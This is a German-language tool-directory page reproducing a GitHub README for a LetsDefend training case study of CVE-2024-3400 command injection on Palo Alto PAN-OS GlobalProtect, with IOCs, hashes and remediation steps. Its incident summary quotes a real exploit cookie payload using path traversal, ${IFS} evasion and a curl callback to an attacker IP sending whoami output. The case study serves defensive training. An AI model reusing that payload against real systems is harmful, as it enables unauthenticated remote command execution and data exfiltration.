Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
letsdefend-cve2024-3400-case-study — Erkennungs-, Analyse- und Reaktionsstrategien für CVE-2024-3400 Ausnutzungsversuche, die auf Palo Alto PAN-OS GlobalProtect-Portale abzielen. Enthält IOCs, Exploit-Muster und Schadensbegrenzungsanleitung. | Kitploit
Tools/GitHubGitHub/
cyprianatsyor
/letsdefend-cve2024-3400-case-study
Management von Indicators of Compromise (IOC)SchwachstellenanalyseExploitationWebanwendungs-ExploitationForensikDigitale ForensikCommand and ControlBedrohungsanalyseLernen & BildungIncident ResponseLog-Analyse
GitHubcyprianatsyor/letsdefend-cve2024-3400-case-study

letsdefend-cve2024-3400-case-study

Erkennungs-, Analyse- und Reaktionsstrategien für CVE-2024-3400 Ausnutzungsversuche, die auf Palo Alto PAN-OS GlobalProtect-Portale abzielen. Enthält IOCs, Exploit-Muster und Schadensbegrenzungsanleitung.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

letsdefend-cve2024-3400-case-study

Erkennungs-, Analyse- und Reaktionsstrategien für CVE-2024-3400-Ausnutzungsversuche, die auf Palo Alto PAN-OS GlobalProtect-Portale abzielen. Enthält IOCs, Exploit-Muster und Anleitungen zur Schadensbegrenzung.

CVE-2024-3400 Vorfalluntersuchung

🔍 Übersicht

Dieses Repository enthält eine detaillierte Untersuchung und Bedrohungsanalyse von CVE-2024-3400, einer kritischen nicht authentifizierten Befehlsinjektions-Schwachstelle, die Palo Alto Networks PAN-OS betrifft, insbesondere das GlobalProtect-Portal.

Am 18. April 2024 wurde eine Ausnutzungsaktivität gegen eine interne PAN-OS-Firewall unter Verwendung des anfälligen Endpunkts /global-protect/login.esp erkannt. Der Angreifer verwendete ein manipuliertes SESSID-Cookie, das einen per Backtick ausgeführten curl-Befehl enthielt, um einen entfernten C2-Server unter 144.172.79.92 (Miami, Florida) zu erreichen. Die Exploit-Payload nutzte ${IFS}, um einfache Filter zu umgehen, und verwendete das Telemetrie-Verzeichnis von PAN-OS, um schädliche Aktivitäten zu inszenieren. Die Firewall antwortete mit einem , was darauf hindeutet, dass die Payload wahrscheinlich erfolgreich ausgeführt wurde.

200 OK

Vorfallübersicht

📄 Vorfallzusammenfassung

  • Ereignis-ID: 249

  • Erkennungsregel: SOC274 – PAN-OS Command Injection Exploitation

  • Ereigniszeit: 18. April 2024, 03:09 UTC

  • Hostname: PA-Firewall-01

  • Ziel-IP: 172.16.17.139

  • Quell-IP: 144.172.79.92

  • Anfragemethode: POST

  • Endpunkt: /global-protect/login.esp

  • Cookie-Payload: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)

  • Schädliche Hashes:

  • SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

  • MD5: 0c1554888ce9ed0da1583dbdf7b31651

  • Schädliches Skript: update.py (ausgeführt mit /usr/bin/python3)

🧠 Bedrohungsinformationen

Bedrohungsinfo

Schritt 1: Erste Erkennung des Exploits durch Suche in malpedia

Untersuchungsschritt 1

Schritt 2: Analyse und Untersuchung des Hashs

Untersuchungsschritt 2

Schritt 3: Weitere Untersuchung

Untersuchungsschritt 3

Schritt 4: IP-Adressen-Untersuchung

Untersuchungsschritt 4

🧠 Verhaltensindikatoren

  • Missbrauch von SESSID zur Befehlsinjektion
  • Verwendung von ${IFS} zur Umgehung
  • Payload-Staging in /opt/panlogs/tmp/device_telemetry
  • Beteiligung des dt_send-Prozesses nach der Ausnutzung
  • Netzwerk-Rückruf zur IP des Angreifers auf Port 4444

📄 Protokollnachweise

Protokollbeispiel


🧩 Hash-Korrelation

Hash-Übereinstimmung


✅ Erzielte Punkte bei LetsDefend

Wichtige Punkte

🚨 Auswirkungen

  • Remote-Ausführung nicht authentifizierter Befehle auf einem zentralen Sicherheitsgerät
  • Möglicher Download und Ausführung einer angreifergesteuerten Python-Payload
  • Missbrauch interner Telemetriemechanismen von PAN-OS zum Staging oder zur Exfiltration
  • Zugelassener Datenverkehr von einer bekannten bösartigen IP

✅ Empfohlene Reaktionsmaßnahmen

  1. Patchen Sie PAN-OS auf die Versionen: 10.2.9-h1, 11.0.4-h1 oder 11.1.2-h3
  2. Blockieren Sie die bösartige IP: 144.172.79.92
  3. Suchen Sie nach Indikatoren für eine Kompromittierung (IOCs) in Protokollen und Dateisystemen
  4. Überprüfen Sie Telemetrie-Verzeichnisse auf verdächtige Dateien oder Ausführungsverhalten
  5. Isolieren Sie betroffene Systeme und führen Sie eine vollständige forensische Analyse durch

📁 Inhalte

  • logs/: Analysierte und rohe Erkennungsprotokolle
  • ioc/: Datei-Hashes und mit dem Angriff verbundene IPs
  • analysis/: Tiefgehende Analyse des Exploit-Verhaltens und der Prozessverfolgung
  • report/: Zusammenfassung und Bilder der Protokolle und Codes meiner Untersuchungen

Was ist CVE-2024-3400

CVE-2024-3400 bezieht sich auf eine kritische Schwachstelle in Palo Alto Networks PAN-OS, die insbesondere GlobalProtect-Gateways betrifft. Hier ist eine Aufschlüsselung dessen, was öffentlich darüber bekannt ist:

🔥 CVE-2024-3400 – Palo Alto PAN-OS Befehlsinjektions-Schwachstelle

CVSS-Score: 10.0 (Kritisch)

Veröffentlicht: April 2024

Betroffene Produkte: PAN-OS 10.2, 11.0 und 11.1 mit aktiviertem GlobalProtect.

Ausnutzung: Im Feld bestätigt (Zero-Day)

Schwachstellentyp: Nicht authentifizierte Befehlsinjektion

🧠 Was ist das Risiko?

CVE-2024-3400 ermöglicht es nicht authentifizierten Angreifern, beliebige Befehle auf dem Betriebssystem der Firewall auszuführen. Dies gibt im Wesentlichen die vollständige Kontrolle über betroffene Geräte ohne Zugangsdaten – ein schwerwiegender Einfallspunkt für jedes Unternehmen, das auf Palo Alto-Firewalls angewiesen ist.

⚠️ Bedingungen für die Ausnutzung:

GlobalProtect-Gateway muss aktiviert sein.

Bestimmte PAN-OS-Versionen (10.2.x, 11.0.x, 11.1.x).

Über das Internet ausnutzbar, wenn keine zusätzlichen Sicherheitsebenen vorhanden sind.

🔎 Was Angreifer tun:

Senden von manipulierten Anfragen zur Ausnutzung der Injektionslücke.

Bereitstellung von Remote-Shells oder Herunterladen von Payloads der zweiten Stufe.

Beobachtetes Verhalten umfasst:

Befehlsausführung über manipulierte URLs

Persistenzmechanismen

Laterale Bewegung innerhalb von Netzwerken

🛡️ Minderung & Empfehlungen:

Sofort patchen: Palo Alto hat Fixes veröffentlicht; aktualisieren Sie auf nicht anfällige Versionen (z.B. 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 oder höher).

Überprüfen Sie auf Indikatoren für eine Kompromittierung (IOCs) wie verdächtige Prozesse, ausgehende Verbindungen oder ungewöhnliche CLI-Verläufe.

Verwenden Sie Tools wie Shodan oder Asset-Inventare, um anfällige Geräte zu finden.

🛠️ Wie man untersucht (z.B. über LetsDefend oder SIEM):

Suchen Sie nach externen IPs, die auf GlobalProtect zugreifen, ohne gültige Authentifizierung.

Überprüfen Sie die Protokolle auf verdächtige Befehlsausführungen (show system processes, cat /etc/passwd usw.).

Überwachen Sie das Firewall-Verhalten und alarmieren Sie bei anomalen ausgehenden Verbindungen.

Dieses Repository dient sowohl als interner Untersuchungsbericht als auch als Bildungsressource für Verteidiger, die das Verständnis realer Ausnutzung von PAN-OS-Schwachstellen suchen. Beiträge und zusätzliche Beobachtungen sind willkommen.

Tool herunterladen